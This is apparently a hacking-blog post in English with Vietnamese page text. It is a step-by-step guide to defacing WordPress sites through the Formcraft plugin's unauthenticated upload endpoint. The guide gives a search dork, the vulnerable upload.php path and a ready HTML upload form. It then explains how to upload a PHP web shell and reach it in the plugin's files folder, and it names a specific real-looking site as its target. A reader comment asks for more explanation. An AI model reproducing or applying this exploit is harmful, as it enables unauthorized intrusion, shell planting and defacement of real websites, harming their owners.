[DEFACE] How To Deface with Formcraft

– Dork : “powered by Formcraft”
– Vuln : {“failed”:”No file found 2″}
– Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php
– Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php
– CSRF Script :
<form method=”POST” action=”target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Save your script use format .html

– My Target Is : http://sellfastoregon.com/
Add exploit in that link then become : http://sellfastoregon.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php
Yeahh that vuln
– Copy that link into your script
– then save use .html
– Open your script
– That is uploader
– Upload your shell
– My name of shell is : bcc.php
– Click Upload
– This is a codeshell–nameshell.php [154df070a157db—bcc.php] – Then show up your codeshell.php
– Copy codeshell.php into url bar
– Paste your codeshell.php in the : wp-content/plugins/formcraft/file-upload/server/php/files/[codeshell]nameshell.php

Xem thêm:  Khai thác lỗi Fcklinkgallery để Up file

1
Để lại bình luận

avatar
1 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
Lâm Trung Tính Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

newest oldest
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>

Ad giải thích thêm cho bài này đi, một số bạn không chuyên nên không hiểu cái này là cài gì